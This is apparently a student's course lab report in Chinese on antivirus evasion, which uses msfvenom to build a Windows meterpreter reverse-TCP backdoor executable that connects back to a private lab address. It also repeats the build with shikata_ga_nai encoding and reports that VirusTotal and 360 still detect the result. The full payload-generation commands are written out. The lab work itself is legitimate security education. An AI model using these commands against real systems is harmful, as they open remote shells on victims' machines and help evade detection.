20191218 Exp3-免杀原理

实验过程

一、正确使用msf编码器、msfvenom生成如jar之类的其他文件

免杀检测

1. 参考实验二Exp2-后门原理与实践中的第三个小实验，在Kali上用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218_backdoor.exe生成针对Windows的毒化后门可执行程序20191218_backdoor.exe
   
2. 放入VirusTotal和360安全卫士中进行扫描

• VirusTotal中的扫描结果
  
  69款杀软中53款报出了病毒，不加处理的后门程序能被大部分的杀软检测到

• 360安全卫士杀毒检测结果
  

3. 使用msf编码器多次迭代，生成exe文件

• 编码会降低检出率，理论上讲多编码几次，可降低被检测出的可能性
• 一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'\x00'不出现在shellcode中，因为shellcode以'\x00'为结束符
  在Kali中输入如下命令

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.174.141 LPORT=1218 -f exe > 20191218exp3.exe

用VirusTotal检测还是能检测出问题

加入多次编码参数-i，继续尝试

放入360查杀还是会检测出病毒

以上步骤说明简单的多次编码无法实现免杀

生成php格式的后门文件

man msfvenom查找msf毒化命令的使用说明

使用如下命令生成php格式的后门文件

标签：后门,编码,exe,免杀,Exp3,检测,msfvenom,原理
来源： https://www.cnblogs.com/20191218tangqiheng/p/16093201.html